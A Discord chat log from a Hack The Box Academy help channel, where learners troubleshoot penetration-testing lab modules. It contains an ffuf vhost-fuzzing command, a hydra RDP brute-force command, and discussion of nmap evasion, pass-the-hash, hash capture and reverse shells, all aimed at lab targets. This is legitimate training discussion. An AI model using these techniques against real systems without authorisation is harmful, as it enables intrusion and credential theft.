you mean reconspider.py doesnt exist?

footprint module: "What is the customized version of the SNMP server?" i've no idea what the answer format should be, any hints?

Yes

and you did the wget and unzipped it

yep

InFreight [Protocol] v[Version]

aaahhh thank you!

np man

try pip3 install scrapy --break and then redownloading reconspider and unzipping it and see if that works

Ok thanks

Permission error... But i don't get for what

there are no js files on the instance

i'm sorry, i dont know where to go from there, hopefully someone more verse can step in

No worries thanks for trying

#modules message

That should work

It says Requirement already satisfied

Ow ok sorry I thought you had still issues with scrapy

You should run the script from a directory you can write in. You got permission error

so "cd /root/Desktop" or wdym?

I would use somewhere in my home folder and not run everything as root

can you show me an example? when u say that i think or doing "cd /root/Desktop/(home folder)" and I feel like youre saying not to do that lol

just "cd "

ok

That worked, thanks!

the one on the left is using HTB provided machine and 2nd on is the HTB VM on my VMware

dotn worry about the IP tho

just restarted it thats all

What are the odds? I'm running LFI/Log Poisoning and someone is nmap scanning the box at the same time?

lol...

You are trying to bypass firewall rules or IPS, I can’t remember, so if you change your IP your count with the firewall gets reset . With one you are blocked and not with the other.

so ur saying to reset again and try on my machine?

Yes it should work, that or a new vpn connection file. In real life, you can’t respawn another instance so you would have to scan from another IP

Curious, it comes from a local IP.

Yup, so somehow connected to someone else's instance I suppose

Is this an Academy module?

yeah

If so, it's not from a local IP, but rather it's routing through the cluster from the public IP / port IIRC

So probably just someone scanning the IP of the cluster

People scan shit 24/7

Interesting - edit Yeah, I saw the 192.168 & figured it was a local scan

So for Identifying SSRF in the SERVER-SIDE ATTACKS module, was ||using Local File Inclusion|| the intended way to get the flag? Only asking because the prompt is to "identify an internal web application"

did u ever get the error i got? cause it doesnt work rip

got the same question as this, im banned before i get my full port scan done

You don't need the -sV @normal panther

-sV does additional probing

As a note I never had to use -D

Also spoiler

The first screenshot has the flag

Has anyone finished the Windows Lateral Movement module? Got a question about a procedure that I might be making a stupid mistake

Module: metasploit
Section: Sessions and Jobs

Output claims system is appears to be vulnerable and injectable. But it does not do its process, i've refreshed the IP address, downloaded a new vpn config. Same issue

However, if i do use the HTB academy system it'll work but it's slow for me which i hate

Btw how would I avoid getting banned ik I would use the -S but sometimes error comes with that

hello everyone how are you?

I'm facing an issue in ATTACKING WEB APPLICATIONS WITH FFUF
Page 9
Filtering Results

Hello

I'm new here

I wanted to get help from #hack the box

What help u need?

@edgy gale some hackers are threating me

what are they saying?

https://tenor.com/view/eww-oh-god-god-no-smh-terrible-gif-23016518

🙂

goblin is here he will threat them 🙂

They are saying that they will terminate my yt account they already hack my location and my jaaz account

Ignore them.

Enable 2FA, update your password.

I tried but the still

still?? they show you any proofs

Then you likely have something dodgy on your computer, and should reformat.

++

@edgy gale yes they show me that I live in punjab

u are from Pakistan?

Yes

ahh what proof they have shown?

When you say hack your jaaz account, what do you mean.

Jaaz is a bank account

Goblin it is basically a Sim card App account

Yes

Ok, can you recover it?

like our bank account it create on sim

100% he can.

Yes I did it I recovered it

Right

Change passwords, enable 2FA, reformat and ignore them.

Go to the police if you want, but unlikely they will do much.

hackthebox tech support 👍

Thank God my money was saved and I changed password

Zakora come in my dm i will help u.

Really

hehe

come in dm.

@young arrow Finished the linux fundamentals module, reccomend I skip to bash coding or do the windows fundamentls + windows cli modules

Just follow the advice above

That's all you really need to do

Ok

No offense @edgy gale - but they've already been taken in by someone they don't know

The last thing we should do is encourage them to confide in someone else they don't know

yepp!

@edgy gale

yeah i got it.

advice?

Have been busting my head on a double hop, if anyone can give me a nudge I'd appreciate! It's on the WinRM section of Win Lateral Movement.
I can get in the Host, but not as the right account which should have the read permissions to the file I want.

bro smh i ran the exact command yesterday and it worked

You wouldn't use -S

btw this is just a question since everything is working for me, but isnt -S to manipuate the source?

so therefore we arnt banned

same thing with the -D RND

hides our ip

-S sends a spoofed ip meaning the reply gets sent to the spoof, not to you

RND includes your IP in the random genned list

so to avoid getting banned only way is to have a VPS set up?

https://nmap.org/book/man-bypass-firewalls-ids.html

Nope

I got the answer without needing to spoof or rnd

Or need a vps

Just don't overthink it tbh

yeah ik it was a general question for a rl senario if i was to get banned obviously i cant restart the machine

You still wouldn't spoof

Read the documentation

On an rl engagement you'd likely limit your scan rate anyway

rl = reallife?

Yes

ayt thanks boss

I'm facing an issue in ATTACKING WEB APPLICATIONS WITH FFUF
Page 9
Filtering Results

RND is only useful for a manual reviewer, so they can't determine which is real btw

It helps if you describe your issue

The simple thing is, are you filtering the result as described?

yeah

Don't use the exact filter from the example

i'm using this

ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://83.136.249.153:37314/ -H 'Host: FUZZ.83.136.249.153:37314' -fs 900

Utilize the results you receive to modify the filter

but he is giving me all the list as result

Dude... you need a vhost for this iirc

hmm

inlanefreight.htb from what I recall

It tells you above the questions what's needed

can u tell me about this..

Breath marcie.. breath..

Read the question

It tells you the domain to fuzz against

yeah i have read it can u tell me is there any mistake in command that i have write?

Try running a VHost fuzzing scan on 'academy.htb', and see what other VHosts you get. What other VHosts did you get?

Your -H is wrong

i ahve write port with it?

this is mistake

Your -H should be -H "host: FUZZ.academy.htb"

i have also tried without writing port in -H but no better result.

That's what's wrong with it

ok lemme check

You don't put the ip at all in the host header

See the last example

yeah i have tried by putting academy.htb also.

lemme check again w8

-u http://Academy.htb:port from the example only works if you have it in your hosts file

yeah i have it in /etc/hosts file

Hosts file shouldn't have the port

That's by far the most common mistake

But you can also do http://ip:port as the only thing that truly matters is the host header

yepp i know

ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://academy.htb:37314/ -H 'Host: FUZZ.academy.htb' -fs 900

it is correct now?

Perhaps

Did you run it

yeah

Then just be patient

but it still give me all wordlists leters result as vhost

Then adjust your filter size

Use the most common response size for your filter

that is 200

Gotta be smarter than the tool you're using

i have tried it but still it give me all as result.

Ok and?

That's not the response size btw

That's the response code

yeah

Response size is listed after size:

yeahs that is response code/status

Since -fs filters out by size that's what you use

I'm trying to tell you but you're not listening lol

oh that maybe a mistake

oh i got it now.

hey yes. What i mean is if your command worked with the pwnbox it should work from you vm, but like Marcie said, there was stuff not needed in your command. You should always try to strip down the command you use to the bare minimum

so what status code mc i have to use.

Not status code

Size

I'm telling you

it is not they do not listen, but they do not obey and comply lol

Change -fs 900 to another value

ok

😦

Look at your results to find the answer

oh i got the result now..

Btw it's referring to the previous section for what filter size you should use and how to determine it

Thank u soooo much... i got it.

The Vhost fuzzing section is directly connected to the filtering results lab

actually i was thinking if i enter 900 it will filter all 900 range value.

i think i have to read that again.

btw Thanks mate.
Have a good day

-fs 900 filters out ONLY result sizes of 900

hmm i got it now.

Not a range

Ranges would be x-y where x is the starting value y is the ending value

Or a list of values a,b,c,d

It helps to actually read the documentation.

It also helps to take notes

omg... didn't realize that was the flag for this exercise. i was having trouble running dnscat2 and decided to come here to look. found that flag and thought it was for another part of the module

@fathom pendant

What

I want to be a member of hack the box

Read and follow #welcome

Ok

I'm not support nor an on-call helper

Trying to fix my sleep schedule atm

@fathom pendant who is leader

Creator

You don't need anyone to give you am invite dude

Just sign up on the website

Unless you mean staff, then you gotta apply for a job

<@&861185840277487616>

Read #rules and shit

We aren't a hacker for hire server

this server is about the hackthebox platform

Really hurting here.... Even the shell I got in the DC is ephemeral and with little permission!

https://app.hackthebox.com if you actually read #welcome you'd know that

We don't do hacking brigading or anything like that

We don't do that here

PIVOTING, TUNNELING, AND PORT FORWARDING
RDP and SOCKS Tunneling with SocksOverRDP

For some reason the SocksOverRDP-Plugin.dll gets removed from the victim host after 1 minute... I tried loading it while it was still there but this happened.

If anyone can help me out on the Win Lateral Movement module, I'd appreciate.
Been stuck on the same for about 6 hours

Real-time protection is running

Defender might not be on, but real-time protection is separate from that

I see.. thx

Hey @upper haven , is it ok to do a check on Client-Side prototype pollution challenge from Whitebox Attacks module? many people are facing a lot of issues to make their payloads work, and i think there are some problems in the challenge... thanks for understanding buddy

#1234357888114364508 is the best place for that feedback

The password is the answer to the previous question

It's the same setup as the previous questions

It also helps to give the module and section name

i see cause even after restart i got the same thing i just moved on from it now perhpas i needed to update my nmap

Nah the medium lab is just weird like that

You can likely get it if you connect to it directly

I tried Pass-The-Ticket but I am not able to progress any further.

United intelligence

U will not understand

Can't find you on Google. Also this isn't a place for this. If you wanna hire someone, post a job offer on some platform

https://tenor.com/view/hug-gif-11734056932374068596

Sorry ZAKORA, can you speak up, or just leave?

Hire people for what exactly

Lol

Somebody help!

.

Also, I am not able to find the compiled binary for Rubeus. The GhostPack repository just contains the source code in its release page. I found Ghostpack-CompiledBinaries repo but when I try to execute it, I get error:

The dot net version in the M* server is v4.0.30319. The repo contains binary for various DotNet versions, but not 4.0.3. I tried all the available versions. They give the same error.

https://academy.hackthebox.com/module/77/section/726

This hint wasn't very useful
Can anyone help?

Get the precompiled version.

https://github.com/jakobfriedl/precompiled-binaries

Use a wordlist

You are welcomed

makes sense, ty

Where?

Thanks

Any way to speed this up?

Timing options or set rates

So let's say -T5, will that work with proxychains aswell?

After 8 ours and battling with the Pwnbox, finally finished the section and i think it wasn't with the path expected.
Took ligolo-ng for tunnel, netexec with module, Rubeus and PSRemote.

Couldn't tell if proxychains is rate limited. Really don't know, but my normal nmap is always set to a higher rate, independent to whether proxying or not.

got crackmapexec to work, thanks! hopefully it doesnt take the entire day to get it

you just need to rdp and psremote

@next bronze more hints please

capture stuff

ntlm

Done that,

But don't get any useful hah from there

which question again?

Crack this user's password hash and submit the cleartext password as your answer.

10th question

yep, capture and crack

Tried that already 😭

I have not got any kind of access to DC01 yet

Chisel/proxychains isn't working properly on the Pwnbox. I've commented earlier.... It worked fine on a bare metal with VPN though.
I guess I'm stubborn and kept trying with it and to pivot without RDPing into SRV02.
I got Remote PowerShell access in DC01 as 'Helen', but my it was too ephemeral and broken, also the Domain Controller would not auth 'Leonvqz'.
I had to resort to ligolo-ng again to get internal network access....

you can just double rdp, the creds from the previous sections give you rdp access to both SRV hosts

Haven't thought of that. Initial approach was to PtH with the provided NTLM hash

did you managed to capture a hash for the user in Q9?

Thought that since I had PSRemote in SRV02, I could at least execute commands remotely in the DC01.
This that got me a a shell as 'Helen'. Executed a base64 PowerShell reverse shell with Invoke-Command.

Should be doable :-)

Just noticed they give the password in the module

fml hahahah

yeah that's the double hop thing, winrm doesn't store creds in memory so you'll need to give plaintext creds if you're already in a session

I think the section did mention that

Yes.... but since I got only the NTLM hash for the other user, I tried to PtH with mimikatz and execute a reverse shell file, but since it kept breaking, it would not execute or it was opening a bunch of windows in the DC which I would not see nevertheless. 😅

Q9?

yes the answer of Q9 is the username of the user you need

No

Thats the question I am stuck on

I know thw username from BloodHound enum

But no password

huh I thought you're stuck on Q10

but again the steps are the same, capture on ms01

im doing the network services RDP question in the password attacks module, i solved all other questions but im stuck on it... hydra is taking too long and its printing out every attempt, i tried -t 4

Can I DM u?

use inveigh

hello @everyone If I downgrade my subcription to student from platinum , will I get a refund?

@fathom pendant do you know that ?

@ everyone doesn't work btw

Message support

where did you men support AI

The website support, yes

There is no support on the discord

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

i written bu I didnt get answer from AI

I don't see why you'd get a refund instead of just a downgrade on your next renew
But as marcie said, contacting sup would be a better idea

There are actual agents in the support chat, they will be coming online soon

Then be patient

Actual human beings answer those questions at times

NO I mean it gave me the wrong answer

Yes I want to talk with human

How do you know its the "wrong" answer

oh well

Then message the bot again

imma try to get a cake recipe from it later then

Support doesn't monitor the discord

because it gave me manual but there not answer

Then say it didn't help

In the chat

oh

did the "talk to a person" button appear to you?

Try clicking that

But yeah you should get the option to connect to someone

I said

Discord isn't the place for support.

Also you can't post images bc your account isn't linked

I knew thanks

Anyway. Just try again

waht does mean

got you, one sec

your HtB account isnt linked to your discord account

https://account.hackthebox.com/security-settings

Scroll down, and click that Discord button

how can i connect

Idk what yours will say cuz mine is already connected

in the site settings

here

this one

thanks

yw

That does nothing afaik; you still gotta link via the #welcome method

can anyone help btw?

Unless they recently made it do something

oh thats weird

Hydra shouldn't be printing every attempt afaik

.

it says "account on ip mightbBbe valid but not active for remote desktop"

did I connect now bro

Rdp is a weird one afaik

not yet

ye

but I connnected how so i checked setting also good

u should have a role

Yea maybe you should try the method in #welcome as @fathom pendant said

And you're using the username and password list from the resources?

like me

yea

Hydra should work afaik for it

hydra -L username.list -P passwords.list rdp://ip

its just taking too long, 1-2 hiurs and im still at sysadmin, which is like at the first 3-7 users or smth

I suggest maybe resetting target/changing vpn region

alr

It shouldn't take 2 hours

i do this but add -t 4

Default rdp is 4 threads

sry that might be an exaggeration, i think its only 1 hour

So you don't need to specify

Even an hour

Most if the password tasks should take at most 20 minutes

Yeah that is odd

my terminal is filled like that xd

Like I said. Reset target or even change vpn region

alr

@nova ginkgo can u plz dm me your registered email address or the username on the HTB Academy platform?

it worked lol

ty

is this really how module should be completed?

Would'nt it be effective to take notes right away after each section in module ?

it's entirely up to you. what they show is a recommendation that you can choose to follow

Pivoting module - Skill Assesment
https://academy.hackthebox.com/module/158/section/1441

"In previous pentests against Inlanefreight, we have seen that they have a bad habit of utilizing accounts with services in a way that exposes the users credentials and the network as a whole. What user is vulnerable?"

I found the correct username while listing directories in C:\Users however I don't think that was the right way to do it, and now I'm wondering if I missed out on something. I can't view the hint anymore.

6 and 7 imo would be the better things to practice

That's a way to do it

There's no "incorrect" way

And C:\users is one of the first places to explore

Alright but I don't understand what is meant with "exposes the users credentials and the network as a whole"

Where would they else be exposed? SMB?

Perhaps

Or in a plaintext file

going over the module once its completed is not really effective for paced learning but it's alright i'd say. How making non-technincal documentation is beneficial for us?

we understand jargons.

this is not pentest report.

The report for the exams require it

So practicing "dumbing down" the explanation is good practice

It also helps cement a general idea of the attack

ahh, they make us do it. that was not the case with CDSA, right?

Idk haven't done it

But I'm assuming the same reporting concept applies

You have the report portion for executives, and the portion for the technical people

following this, it'll take me around 6 months to complete cpts path-

That's not bad

Most people take around that long

It might be. Im un-employed currently, just finished college.

It just helps with understanding overall as a "can you explain this to someone that doesn't know tech"

Ok and?

same, but I was kicked from uni also xD

now that's what i'd call art.

The cert doesn't guarantee any type of job

No cert or degree does

It would look bad on resume, like a break- if i dont take the exam.

it get's you shortlisted and recognised, then further your knowledge gets you the job.

Not really

How would it make you look bad lol

i finished college, you were kicked, lmao. how is that same? kidding

Either way. The only way to look bad on your resume is if you make yourself look bad

idk, i did soc analyst path, took me 6 months (3months i was very sick). I dont think employers here even recognises the htb stuff in my resume.